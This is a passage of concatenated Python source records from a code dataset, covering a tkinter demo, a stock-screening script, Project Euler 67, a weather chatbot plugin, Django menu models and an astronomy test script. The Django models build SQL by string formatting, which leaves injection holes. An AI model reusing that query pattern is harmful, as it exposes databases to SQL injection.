\"\n return data\n\n\n@app.route('/email_log')\ndef email_log():\n data = open(path + \"/log.txt\", \"r\").read()\n return data\n\n\n# add your job here\nsched.add_interval_job(cronJob, seconds=10)\nif __name__ == '__main__':\n app.run()\n\n\n","sub_path":"flaskapp2.py","file_name":"flaskapp2.py","file_ext":"py","file_size_in_byte":32495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"49759666","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\n# Create the root window\nroot = tk.Tk()\nroot.title('tkinter testing')\n\n# Create a fram with some padding\nframe = ttk.Frame(root)\nframe['padding'] = (5)\n\n# Buttons\nbutton1 = ttk.Button(frame, text='Cancel')\nbutton2 = ttk.Button(frame, text='OK')\n\n# Check box\ncheckbtn_onoff = ttk.Checkbutton(frame, text='On or off')\n\n# Entry boxes and their labels.\nlabel1 = ttk.Label(frame, text=\"Username:\")\nlabel2 = ttk.Label(frame, text=\"Location:\")\n\n# username = tk.StringVar()\n# location = tk.StringVar()\nentry_name = ttk.Entry(frame)\nentry_location = ttk.Entry(frame)\n\n\n# occupation = tk.StringVar()\ncombo_occupation = ttk.Combobox(frame)\ncombo_occupation['values'] = ['Policeman', 'Fireman', 'Astronaut', 'Computer Science Teacher']\n# combo_occupation['state'] = 'readonly'\n# combo_occupation.current(0)\n# combo_occupation.bind('<>', lambda e: combo_occupation.selection_clear())\n\n\n# Place the frame in the root's grid\nframe.grid(column=0, row=0, sticky='swen')\n\n# Place all the other widgets in the frame\nlabel1.grid(row=0, column=0, sticky='w')\nlabel2.grid(row=1, column=0, sticky='w')\nbutton1.grid(column=1, row=3, sticky='ne')\nbutton2.grid(column=2, row=3, sticky='ne')\ncheckbtn_onoff.grid(column=2, row = 2, sticky='n')\nentry_name.grid(column=1, row=0, columnspan=2, sticky='ew')\nentry_location.grid(column=1, row=1, columnspan=2, sticky='ew')\ncombo_occupation.grid(column=0, row=2, columnspan=2, sticky='new')\n\nroot.columnconfigure(0, weight=1)\nroot.rowconfigure(0, weight=1)\nframe.columnconfigure(1, weight=1)\nframe.rowconfigure(2, weight=1)\n#\n# dirname = filedialog.askopenfile()\n# print(dirname)\n#\n# messagebox.askquestion(\"Hi there.\", message=\"This is nice isn't it?\", icon='question')\n\nroot.mainloop()\n","sub_path":"gui/tk_layout2.py","file_name":"tk_layout2.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"55624515","text":"#Get the projected total sales\r\ntotal_sales = float(input('Enter the projected sales:'))\r\n#Calculatethe profit as 23 percent of total sales\r\nannualprofit = total_sales* .23\r\n#Display the profit\r\nprint('The profit is $',format(annualprofit,',.2f'))\r\n\r\n#CTI-110\r\n#P2T1 - Sales Prediction\r\n#Toneshia Ried\r\n#February 12, 2018\r\n\r\n","sub_path":"P2T1_SalesPrediction_RiedToneshia.py","file_name":"P2T1_SalesPrediction_RiedToneshia.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"132991965","text":"import os\nimport time\nimport akshare as ak\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport requests\n\nfrom sklearn.linear_model import LinearRegression\nfrom funcat import *\nfrom funcat.account import Account\nfrom funcat.context import ExecutionContext as funcat_execution_context\n\n\n# 当前股价比最近m天股价最高点下跌n-1\ndef select_down_from_max(m, n):\n 
return COUNT(HHV(H, 5) / L >= n, m) >= 1\n\n\ndef select_by_volume(n):\n    d = IF(O > C, V, 0)\n    u = IF(O > C, 0, V)\n    d_max = HHV(d, n)\n    u_max = HHV(u, n)\n    return d_max < u_max\n\n\n# Tongdaxin \"Eight Immortals Crossing the Sea\" buy indicator, trend-following\ndef select_buy_signal(n):\n    return ((ZIG(C[n], 6) > REF(ZIG(C[n], 6), 1) and REF(ZIG(C[n], 6), 1) <= REF(ZIG(C[n], 6), 2) <= REF(\n        ZIG(C[n], 6), 3) or (\n            ZIG(C[n], 22) > REF(ZIG(C[n], 22), 1) and REF(ZIG(C[n], 22), 1) <= REF(ZIG(C[n], 22), 2) <= REF(ZIG(C[n], 22),\n                                                                                                           3))))\n\n\n# within the last n days the close rises above the 5/13/21/34/55-day moving averages for the first time\ndef select_over_average(n):\n    candidate = 0\n    for i in range(n):\n        ma5 = MA(C[i], 5)\n        ma13 = MA(C[i], 13)\n        ma21 = MA(C[i], 21)\n        ma34 = MA(C[i], 34)\n        ma55 = MA(C[i], 55)\n        if REF(C[i], 0) < ma5 or REF(C[i], 0) < ma13 or REF(C[i], 0) < ma21 or REF(C[i], 0) < ma34 or REF(C[i], 0) < ma55:\n            continue\n\n        ret = (COUNT((C[i] > MA(C[i], 5)) & (C[i] > MA(C[i], 13)) & (C[i] > MA(C[i], 21)) & (C[i] > MA(C[i], 34)) & (C[i] > MA(C[i], 55)), n) == 1)\n        # print(i, ret, candidate, get_current_date(), select_by_volume(21), COUNT(select_buy_signal(0), 34), COUNT(100 * (C[i] - REF(C[i], 1)) / REF(C[i], 1) >= 3., 55))\n        if ret and select_by_volume(21) and COUNT(select_buy_signal(0), 34) >= 1 and (COUNT(100 * (C[i] - REF(C[i], 1)) / REF(C[i], 1) >= 3., 55) >= 4):\n            _, peers = zig_helper(C.series[-(i+1):], 7)\n            # print(i, ret, candidate, peers, get_current_date(), select_by_volume(13), COUNT(select_buy_signal(0), 15), COUNT(100 * (C[i] - REF(C[i], 1)) / REF(C[i], 1) >= 3., 55))\n            if len(peers) <= 3:\n                candidate = candidate + 1\n                # print(candidate, get_current_date(), symbol(get_current_security()), i, ma55, peers)\n                # print(C.series[-(i+1):])\n        # if ret:\n        #     print(get_current_date(), symbol(get_current_security()), \"broke above the 5/13/21/34/55-day moving averages\", C, ma5)\n\n    return candidate == 1\n\n\ndef select_macd_cross_up():\n    diff = EMA(C, 12) - EMA(C, 26)\n    dea = EMA(diff, 9)\n    macd = 2 * (diff - dea)\n\n    x_train = []\n    y_train = []\n    for i in range(100):\n        if macd[i] > 0 and macd[i + 1] < 0:\n            x_train.append(i)\n            y_train.append(diff[i].value)\n\n        if len(x_train) == 3:\n            break\n\n    x_train.reverse()\n    y_train.reverse()\n    x_train = list(map(lambda i: -i + max(x_train), x_train))\n    if len(x_train) != 3:\n        return -np.nan\n\n    model = LinearRegression()\n    model.fit(np.array(x_train).reshape(-1, 1), np.array(y_train).reshape(-1, 1))\n    coef = model.coef_\n    return coef\n\n\n# the long-term 34/55-day moving averages have formed an uptrend over the last n consecutive days\ndef select_long_average_up(n):\n    model = LinearRegression()\n    y_train = []\n    for i in range(n - 1, -1, -1):\n        y_train.append(MA(C[i], 34).value)\n    try:\n        model.fit(np.array(range(len(y_train))).reshape(-1, 1), np.array(y_train).reshape(-1, 1))\n    except Exception as e:\n        print(e, y_train)\n    ma34_coef = model.coef_\n\n    # print(ma34_coef, y_train)\n    y_train = []\n    for i in range(n - 1, -1, -1):\n        y_train.append(MA(C[i], 55).value)\n    try:\n        model.fit(np.array(range(len(y_train))).reshape(-1, 1), np.array(y_train).reshape(-1, 1))\n    except Exception as e:\n        print(e, y_train)\n    ma55_coef = model.coef_\n\n    # print(ma55_coef, y_train)\n    return ma34_coef > 0. 
or ma55_coef > 0.\n\n\ndef callback(date, order_book_id, sym):\n    rw = sym + \" \"\n    ccnt = 0\n    tcnt = 0\n    uup = 0\n    time_tmp = \"\"\n    # trading_dates does not include today, due to a caching issue\n    # count how many times the stock-picking strategy was profitable over the past 7 years, and the maximum gain\n    for itr, time in enumerate(trading_dates[:-7]):\n        T(time)\n        try:\n            if select_over_average(31) and select_long_average_up(2):\n                if time_tmp == \"\":\n                    time_tmp = time\n                elif int(time) - int(time_tmp) < 23:  # interval between adjacent picks must be larger than 23 days\n                    continue\n\n                tcnt = tcnt + 1\n                cur_price = C.value\n                max_price = C.value\n                max_dates = itr + 30\n                if itr + 30 >= len(trading_dates):\n                    max_dates = len(trading_dates)\n                for it in range(itr, max_dates, 1):\n                    T(trading_dates[it])\n                    if C.value > max_price:\n                        max_price = C.value\n\n                # regard the pick as profitable if the price booms 4%\n                if max_price > cur_price * 1.04:\n                    ccnt = ccnt + 1\n                    uup = int(round((max_price - cur_price) / cur_price, 2) * 100)\n        except Exception as e:\n            continue\n\n    # set the trade date back to the original value.\n    T(date)\n\n    if ccnt != 0:\n        rw = rw + \" picked \" + str(tcnt) + \" times since 2015, accurate \" + str(ccnt) + \" times, best gain \" + str(uup) + \"%\"\n        print(date, rw)\n\n        with open('hk_daily_stock', 'a+') as fp:\n            fp.write(rw + \"\\n\")\n\n\nday = (datetime.datetime.now() + datetime.timedelta(days=0)).strftime('%Y%m%d')\nday0 = (datetime.datetime.now() + datetime.timedelta(days=-3)).strftime('%Y%m%d')\n\nset_data_backend(AkshareHKDataBackend())\ndata_backend = funcat_execution_context.get_data_backend()\ntrading_dates = data_backend.get_trading_dates(\"20150808\", day)\nprint(trading_dates)\norder_book_id_list = data_backend.get_order_book_id_list()\nprint(order_book_id_list)\n\nwith open('hk_daily_stock', 'w') as fp:\n    fp.write(\"First screening (catching short-term bull stocks; a gain of 5%+ within 30 days counts as accurate):\\n\")\n\nselect(\n    lambda: select_over_average(31) and select_long_average_up(2),\n    start_date=trading_dates[-1],\n    end_date=trading_dates[-1],\n    callback=callback,\n)\n","sub_path":"for_stocks/choose_stock_hk.py","file_name":"choose_stock_hk.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"39144415","text":"# Project Euler Problem 67\n# https://projecteuler.net/problem=67\n\n# By starting at the top of the triangle below and moving to adjacent numbers on the row below,\n# the maximum total from top to bottom is 23.\n# 3\n# 7 4\n# 2 4 6\n# 8 5 9 3\n# That is, 3 + 7 + 4 + 9 = 23.\n\n# Find the maximum total from top to bottom in triangle.txt, a 15K text file containing a triangle with one-hundred rows.\n\n# NOTE: This is a much more difficult version of Problem 18. It is not possible to try every route to solve this problem, \n# as there are 2^99 altogether! If you could check one trillion (10^12) routes every second it would take over twenty billion \n# years to check them all. There is an efficient algorithm to solve it. ;o)\n\n\n# I am going to copy and paste my code from Problem 18, changing only the values of arr. Let's see if it works!\n# Algorithm: Similar to minimax in that it bubbles up the highest values from the bottom. Each location of\n#\t\t\t arr will hold the \"value\" of its location. 
I define the \"value\" of a location to be the sum \n#\t\t\t of itself and the greater of the two values immediately below it.\nimport time\nstart = time.time()\n\n\ntriangle = open(\"text/triangle.txt\", \"r\")\narr = []\n\nfor row in triangle:\n\trow = row.rstrip()\t\t\t\t\t\t\t# Remove newline\n\trow = [int(i) for i in row.split(\" \")]\t\t# Cast to int and store in array\n\tarr.append(row)\t\t\t\t\t\t\t\t# Append row to arr\n\n# Copied code from Problem 18.py\nfor i in reversed(range(0, len(arr)-1) ):\t\t\t\t# For each row, from the second bottom to the top\n\tfor j in range(0, len(arr[i]) ):\t\t\t\t\t# For each element in that row\n\t\tbigger = arr[i+1][j] if arr[i+1][j] > arr[i+1][j+1] else arr[i+1][j+1]\n\t\tarr[i][j] += bigger\n\nprint(arr[0][0])\n\n# Hurray! It worked on the first try!\nprint(time.time()-start)\ntriangle.close()","sub_path":"assets/Euler/Problem67.py","file_name":"Problem67.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"424303039","text":"\"\"\"\nUse forecast.io to get current weather forecast for a given location.\n\nInstructions:\n * Get an API key from https://developer.forecast.io/\n * Store API key in config.json:forecast_api_key\n\"\"\"\n\nimport logging\nimport requests\n\nimport plugins\n\nlogger = logging.getLogger(__name__)\n_internal = {}\n\ndef _initialize(bot):\n api_key = bot.get_config_option('forecast_api_key')\n if api_key:\n _internal['forecast_api_key'] = api_key\n plugins.register_user_command(['forecast'])\n else:\n logger.info('not enabled, need forecast.io API key in config[\"forecast_api_key\"]')\n\n\ndef forecast(bot, event, *args):\n \"\"\"Returns weather information from Forecast.io.\n/bot forecast Get location's current weather.\n/bot forecast Get current weather of last used location.\n/bot forecast unit Set unit to display degrees.\"\"\"\n\n if not bot.memory.exists(['forecast']):\n bot.memory.set_by_path(['forecast'], {})\n\n if not bot.memory.exists(['forecast', event.conv_id]):\n bot.memory.set_by_path(['forecast', event.conv_id], {})\n\n conv_forecast = bot.memory.get_by_path(['forecast', event.conv_id])\n\n unit = conv_forecast.get('unit', 'F')\n _internal['unit'] = unit\n\n # just setting units\n if len(args) == 2 and args[0] == 'unit':\n unit = parse_unit(args[1])\n if unit is None:\n yield from bot.coro_send_message(\n event.conv_id,\n _('{} is not a recognized unit. Try F or C').format(args[1]))\n else:\n _internal['unit'] = unit\n conv_forecast['unit'] = unit\n bot.memory.set_by_path(['forecast', 'unit'], conv_forecast)\n bot.memory.save()\n yield from bot.coro_send_message(\n event.conv_id,\n _('Reporting weather in degrees {}').format(unit))\n return\n\n if args:\n coords = lookup_address(' '.join(args))\n if not coords:\n yield from bot.coro_send_message(\n event.conv_id,\n _('{}: not found').format(' '.join(args)))\n return\n conv_forecast[event.user.id_.chat_id] = coords\n bot.memory.set_by_path(['forecast', event.conv_id], conv_forecast)\n bot.memory.save()\n else:\n coords = conv_forecast.get(event.user.id_.chat_id, None)\n if not coords:\n yield from bot.coro_send_message(\n event.conv_id,\n _('Your location history not found. 
Use /bot weather address.'))\n            return\n        yield from bot.coro_send_message(event.conv_id, lookup_weather(coords))\n\n\ndef lookup_address(location):\n    \"\"\"\n    Retrieve the coordinates of the location.\n\n    :param location: string argument passed by user.\n    :returns: dictionary containing latitude and longitude.\n    \"\"\"\n    google_map_url = 'https://maps.googleapis.com/maps/api/geocode/json'\n    payload = {'address': location}\n    resp = requests.get(google_map_url, params=payload)\n    try:\n        resp.raise_for_status()\n        results = resp.json()['results'][0]\n        return {\n            'lat': results['geometry']['location']['lat'],\n            'lng': results['geometry']['location']['lng'],\n            'address': results['formatted_address']\n        }\n    except (IndexError, KeyError):\n        logger.error('unable to parse address return data: %d: %s', resp.status_code, resp.json())\n        return None\n\n\ndef lookup_weather(coords):\n    \"\"\"\n    Retrieve the current forecast at the coordinates.\n\n    :param coords: Dictionary containing latitude and longitude.\n    :returns: Formatted string describing the current forecast.\n    \"\"\"\n\n    url = 'https://api.forecast.io/forecast/{}/{},{}'.format(\n        _internal['forecast_api_key'], coords['lat'], coords['lng'])\n    resp = requests.get(url)\n\n    try:\n        resp.raise_for_status()\n        j = resp.json()['currently']\n    except (IndexError, KeyError):\n        logger.exception('bad weather results: %d', resp.status_code)\n        return _('Unable to parse forecast data.')\n\n    unit = _internal.get('unit', 'F')\n    temperature = j['temperature'] if unit == 'F' else to_celsius(j['temperature'])\n\n    return _('In {}, it is currently {}, {:.0f}{} and {:.0f}% humidity.').format(\n        coords['address'], j['summary'].lower(), round(temperature, 0), unit, j['humidity']*100)\n\n\ndef to_celsius(f_temp):\n    \"\"\"\n    Converts Fahrenheit to Celsius.\n\n    :param f_temp: Temperature in degrees Fahrenheit.\n    :returns: Temperature in degrees Celsius.\n    \"\"\"\n    return (f_temp - 32) / 1.8\n\n\ndef parse_unit(unit):\n    \"\"\"\n    Parses and normalizes a user-passed unit of temperature.\n\n    :param unit: User-passed unit of temperature.\n    :returns: Normalized unit of temperature.\n    \"\"\"\n    if unit.lower() in ['f', 'fahrenheit']:\n        return 'F'\n    elif unit.lower() in ['c', 'celsius', 'centigrade']:\n        return 'C'\n    else:\n        return None\n","sub_path":"plugins/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"468254913","text":"from django.db import models\nfrom django.db import connection\nfrom bearbites._con import getConnection\nfrom bearbites._con import dictfetchall\nfrom restaurant.models import Restaurant\n# Create your models here.\nclass Menu(Restaurant):\n    menuID = models.IntegerField()\n\n\n    def get_menuID(self):\n        return self.menuID\n\n    def set_menuID(self,num):\n        self.menuID = num\n\n# For Some Reason, GetItemPrice was in Menu instead of MenuItem\n\nclass MenuItem(Menu):\n\n    itemID = models.IntegerField()\n    itemName = models.CharField(max_length=128)\n    itemType = models.CharField(max_length=128)\n    itemDescription = models.CharField(max_length=128)\n    itemPrice = models.CharField(max_length=128)\n    itemDiscount = models.CharField(max_length=128)\n    itemImageURL = models.CharField(max_length=128)\n\n# Getter Methods\n    def __str__(self):\n        return self.itemName\n\n    def get_itemID(self):\n        return self.itemID\n\n    def get_itemName(self):\n        return self.itemName\n\n    def get_itemType(self):\n        return self.itemType\n\n    def get_itemDescription(self):\n        return 
self.itemDescription\n\n def get_itemPrice(self):\n return self.itemPrice\n\n def get_itemDiscount(self):\n return self.itemDiscount\n\n def get_itemImageURL(self):\n return self.itemImageURL\n\n# Setter Methods\n def set_itemID(self, num):\n self.itemID = num\n\n def set_itemName(self,name):\n self.itemName = name\n\n def set_itemType(self,type):\n self.itemType = type\n\n def set_itemDescription(self,desc):\n self.itemDescription = desc\n\n def set_itemDiscount(self,dis):\n self.itemDiscount = dis\n\n def set_itemImageURL(self,link):\n self.itemImageURL = link\n\n## Database Queries\n\n# Item Propogration\n def addMenuItem(self):\n try:\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"\" # SQL Query to Execute\n cursor.execute(sql.format()) #Fill the Query with Class Properties\n cnxn.commit()\n cursor.close()\n cnxn.close()\n del cnxn\n response = \"Menu Item succefully created\"\n except:\n response = \"Error creating Menu Item\"\n return response\n\n# Item Deletion\n def deleteMenuItem(self):\n try:\n cnxn = getConnection()\n cursor= cnxn.cursor()\n sql = \"\"\n cursor.execute(sql.format())\n cnxn.commit()\n cursor.close()\n cnxn.close()\n del cnxn\n response = \"Menu Item succesfully deleted\"\n except:\n response = \"Error deleting Menu Item\"\n return response\n\n# Item Querying\n\n#Query by Description\n def viewMenuCategory(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"SELECT ItemName,ItemDesc,Price FROM Items WHERE MenuID = {} AND itemType = {};\".format(self.menuID,self.itemType)\n cursor.execute(sql)\n return dictfetchall(cursor)\n\n#Query All Menu Items\n def viewMenu(self,menu):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"SELECT ItemName,ItemDesc,Price,ItemURL FROM Items WHERE MenuID = {}\".format(menu)\n cursor.execute(sql)\n return dictfetchall(cursor)\n\n#Query All Restaurant Items\n def viewItems(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"EXEC ViewRestaurantsItems @Restaurant= {}\".format(self.restaurantID)\n cursor.execute(sql)\n return dictfetchall(cursor)\n\n def foodForensics(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"SELECT MenuID FROM Items WHERE ItemID = {};\".format(int(self.itemID))\n cursor.execute(sql)\n menu = cursor.fetchall()[0][0]\n sql = \"SELECT Restaurant.RestaurantName FROM Restaurant INNER JOIN Menu ON Restaurant.RestaurantID = Menu.RestaurantID WHERE MenuID = {};\".format(int(menu))\n cursor.execute(sql)\n restaurantName = cursor.fetchall()[0][0]\n sql = \"SELECT ItemName,Price,Discount,ItemURL FROM Items WHERE ItemID = {};\".format(int(self.itemID))\n cursor.execute(sql)\n response = dictfetchall(cursor)\n response[0][\"restaurantName\"] = restaurantName\n return response\n\n#Get an Item's price\n def getItemPrice(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"Select Price FROM Items WHERE ItemID= {}\".format(self.itemID)\n cursor.execute(sql)\n results = cursor.fetchall()\n response = results[-1][0]\n cursor.close()\n cnxn.close()\n del cnxn\n return response\n\n#Get an Item's price\n def getItemRestaurant(self):\n cnxn = getConnection()\n cursor = cnxn.cursor()\n sql = \"Select Restaurant.RestaurantID FROM ((Items inner join Menu on Items.MenuID = Menu.MenuID ) inner join Restaurant on Menu.RestaurantID = Restaurant.RestaurantID ) WHERE ItemID={}\".format(self.itemID)\n cursor.execute(sql)\n results = cursor.fetchall()\n response = results[-1][0]\n cursor.close()\n cnxn.close()\n del cnxn\n return 
\n","sub_path":"menu/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"304574882","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 29 14:21:53 2020\n\n@author: SpaceMeerkat\n\nThis script takes the THINGS moment maps and encodes them using a pretrained\nnetwork. The encodings are then used to create output images for comparison\nto the original moment maps. This is a blind test script and therefore there\nis no GPU coding involved.\n\n\"\"\"\n\n# =============================================================================\n# Import relevant packages\n# =============================================================================\n\nimport glob\nimport numpy as np\nimport pandas as pd\nimport sys\nsys.path.append(\"../utils/\")\nimport torch\nfrom tqdm import tqdm\n\nfrom functions import WISDOM_plotter\nfrom model_int import CAE\nfrom rcparams import rcparams\nrcparams()\nfrom WISDOM_utils import WISDOM_loader as load\n\n# =============================================================================\n# Setup paths\n# =============================================================================\n\nmodel_path = '/path/to/saved/models/'\ndata_path = '/path/to/testing/data/'\nresults_path = '/path/to/save/testing/results/'\nimage_path = '/path/to/save/images/'\nbarolo_path = '/path/to/barolo/rotation/curves/'\n\n# =============================================================================\n# Apply dropout to get the mean and std for learned parameters\n# =============================================================================\n\ndef apply_dropout(m):\n    if type(m) == torch.nn.Dropout:\n        m.train(True)\n\nmodel = CAE()\nmodel.load_state_dict(torch.load(model_path+'semantic_AE_THINGS_&_KinMS_2.pt'))\nmodel = model.cpu()\nmodel.train(False)\nmodel.apply(apply_dropout)\n\nprint(\"Model cast to CPU\")\n\n# =============================================================================\n# Collect all WISDOM filenames for testing all of them\n# =============================================================================\n\nmom0_filenames = glob.glob(data_path + '*mom0.fits')\nmom0_filenames.sort()\n\nnames = []\nfor i in mom0_filenames:\n    name = i.split('/')[-1]\n    split = name.split('_')\n    if name[0] == 'N':\n        names.append(split[0] + '_' + split[1])\n    else:\n        names.append(split[0])\nnames = np.array(names)\n\nprint(names)\n\n# =============================================================================\n# Collecting the mom0 and mom1 tensors for testing\n# =============================================================================\n\nmom0s, mom1s, pos, cdelts, sizes, vcirc, barolo = load(data_path, barolo_path)\n \nmom0s, mom1s = np.array(mom0s), np.array(mom1s)\n\nmom0s = torch.tensor(mom0s).to(torch.float)\nmom1s = torch.tensor(mom1s).to(torch.float)\n\npos = torch.zeros(mom0s.shape[0]).to(torch.float)\n\nprint(\"Test data created\")\n\n# =============================================================================\n# Collecting blind test WISDOM parameters via encoding\n# 
=============================================================================\n\npredictions = []\nerrors = []\nfor j in range(mom0s.shape[0]): \n temp_pred = []\n for _ in range(100):\n prediction1 = model.test_encode(mom0s[j].unsqueeze(0),mom1s[j].unsqueeze(0),\n pos[j].unsqueeze(0))\n prediction1 = prediction1.detach().numpy()\n temp_pred.append(prediction1)\n temp_pred = np.vstack(temp_pred)\n mean_pred = np.mean(temp_pred,0)\n predictions.append(mean_pred)\n errors.append(np.sum(np.abs(temp_pred-mean_pred[None,:]),0)/len(temp_pred))\n \nprint(\"Testing data complete\")\n\npredictions = np.vstack(predictions)\nerrors = np.vstack(errors)\n\ndfp = pd.DataFrame(predictions)\ndfe = pd.DataFrame(errors)\ndfn = pd.DataFrame(names)\n\ndf = pd.concat([dfn,dfp,dfe],axis=1)\ndf.columns = ['OBJECT',0,1,2,3,4,5,6,7,8,9]\n\n# =============================================================================\n# Save the results to pickle\n# =============================================================================\n\ndf.to_pickle(results_path + 'THINGS.pkl')\n\n# =============================================================================\n# Put the medians back into the network to get \"out\" images\n# =============================================================================\n\npredictions = torch.tensor(predictions).to(torch.float).unsqueeze(1).unsqueeze(1).unsqueeze(1)\n\nbatch_size = predictions.shape[0] \n\n### Create the auxiliary arrays\nl = torch.arange(0 - 63/2., (63/2.)+1)\nyyy, xxx, zzz = torch.meshgrid(l,l,l)\n\nxxx, yyy, zzz = xxx.repeat(batch_size,1,1,1), yyy.repeat(batch_size,1,1,1), zzz.repeat(batch_size,1,1,1)\nxxx = xxx.to(torch.float)\nyyy = yyy.to(torch.float)\nzzz = zzz.to(torch.float)\n\nmom0s[mom0s<0.001] = 0\nmom1s[mom0s==0] = 0\n\nBRIGHTNESS, VELOCITY, vmax = CAE(xxx,yyy,zzz).test_images(mom0s, mom1s, predictions[:,:,:,:,0], \n predictions[:,:,:,:,1], predictions[:,:,:,:,2], \n predictions[:,:,:,:,3], predictions[:,:,:,:,4],\n predictions[:,:,:,:,0]*0 + 1, shape=64)\n\n# =============================================================================\n# Plot the images\n# =============================================================================\n\nfor i in tqdm(range(mom0s.shape[0])):\n WISDOM_plotter(sizes,mom0s.squeeze(1).numpy(),mom1s.squeeze(1).numpy(),\n BRIGHTNESS.squeeze(1),VELOCITY.squeeze(1),\n dfp.values,dfe.values, i, vcirc,\n save_path = '/home/anubis/c1307135/Corellia/THINGS/Pred_images/'+dfn.iloc[i].values[0]+'.pdf',\n barolo=barolo)\n \n# =============================================================================\n# End of script\n# =============================================================================\n\n","sub_path":"testing/THINGS_tester.py","file_name":"THINGS_tester.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"119943289","text":"import base64\nimport json\nimport logging\nfrom collections import deque\nfrom contextlib import suppress\nfrom typing import Deque, Dict, List, Optional\nfrom uuid import UUID\n\nimport attr\nfrom cryptography import fernet\nfrom fastapi import FastAPI, HTTPException\nfrom httpx import AsyncClient, Response, codes\nfrom pydantic import ValidationError\nfrom starlette import status\n\nfrom ..core.settings import WebServerSettings\nfrom ..models.domain.projects import NewProjectIn, Project\nfrom ..models.raw_data import JSON, ListAnyDict\nfrom ..utils.client_base import BaseServiceClientApi, 
setup_client_instance\n\nlogger = logging.getLogger(__name__)\n\n\n@attr.s(auto_attribs=True)\nclass AuthSession:\n \"\"\"\n - wrapper around thin-client to simplify webserver's API\n - sets endspoint upon construction\n - MIME type: application/json\n - processes responses, returning data or raising formatted HTTP exception\n - The lifetime of an AuthSession is ONE request.\n\n SEE services/api-server/src/simcore_service_api_server/api/dependencies/webserver.py\n \"\"\"\n\n client: AsyncClient # Its lifetime is attached to app\n vtag: str\n session_cookies: Dict = None\n\n @classmethod\n def create(cls, app: FastAPI, session_cookies: Dict):\n return cls(\n client=app.state.webserver_client,\n vtag=app.state.settings.API_SERVER_WEBSERVER.WEBSERVER_VTAG,\n session_cookies=session_cookies,\n )\n\n @classmethod\n def _process(cls, resp: Response) -> Optional[JSON]:\n # enveloped answer\n data, error = None, None\n try:\n body = resp.json()\n data, error = body.get(\"data\"), body.get(\"error\")\n except (json.JSONDecodeError, KeyError):\n logger.warning(\"Failed to unenvelop webserver response\", exc_info=True)\n\n if codes.is_server_error(resp.status_code):\n logger.error(\n \"webserver error %d [%s]: %s\",\n resp.status_code,\n resp.reason_phrase,\n error,\n )\n raise HTTPException(status.HTTP_503_SERVICE_UNAVAILABLE)\n\n if codes.is_client_error(resp.status_code):\n msg = error or resp.reason_phrase\n raise HTTPException(resp.status_code, detail=msg)\n\n return data\n\n # OPERATIONS\n # TODO: refactor and code below\n # TODO: policy to retry if NetworkError/timeout?\n # TODO: add ping to healthcheck\n\n async def get(self, path: str) -> Optional[JSON]:\n url = path.lstrip(\"/\")\n try:\n resp = await self.client.get(url, cookies=self.session_cookies)\n except Exception as err:\n # FIXME: error handling\n logger.exception(\"Failed to get %s\", url)\n raise HTTPException(status.HTTP_503_SERVICE_UNAVAILABLE) from err\n\n return self._process(resp)\n\n async def put(self, path: str, body: Dict) -> Optional[JSON]:\n url = path.lstrip(\"/\")\n try:\n resp = await self.client.put(url, json=body, cookies=self.session_cookies)\n except Exception as err:\n logger.exception(\"Failed to put %s\", url)\n raise HTTPException(status.HTTP_503_SERVICE_UNAVAILABLE) from err\n\n return self._process(resp)\n\n # PROJECTS resource ---\n # TODO: error handling!\n\n async def create_project(self, project: NewProjectIn):\n resp = await self.client.post(\n \"/projects\",\n params={\"hidden\": True},\n data=project.json(\n by_alias=True, exclude={\"state\"}\n ), ## FIXME: REEAAAALY HACKY!\n cookies=self.session_cookies,\n )\n\n data: Optional[JSON] = self._process(resp)\n return Project.parse_obj(data)\n\n async def get_project(self, project_id: UUID) -> Project:\n resp = await self.client.get(\n f\"/projects/{project_id}\", cookies=self.session_cookies\n )\n\n data: Optional[JSON] = self._process(resp)\n return Project.parse_obj(data)\n\n async def list_projects(self, solver_name: str) -> List[Project]:\n # TODO: pagination?\n resp = await self.client.get(\n \"/projects\",\n params={\"type\": \"user\", \"show_hidden\": True},\n cookies=self.session_cookies,\n )\n\n data: ListAnyDict = self._process(resp) or []\n\n # FIXME: move filter to webserver API (next PR)\n projects: Deque[Project] = deque()\n for prj in data:\n possible_job_name = prj.get(\"name\", \"\")\n if possible_job_name.startswith(solver_name):\n try:\n projects.append(Project.parse_obj(prj))\n except ValidationError as err:\n logger.warning(\n 
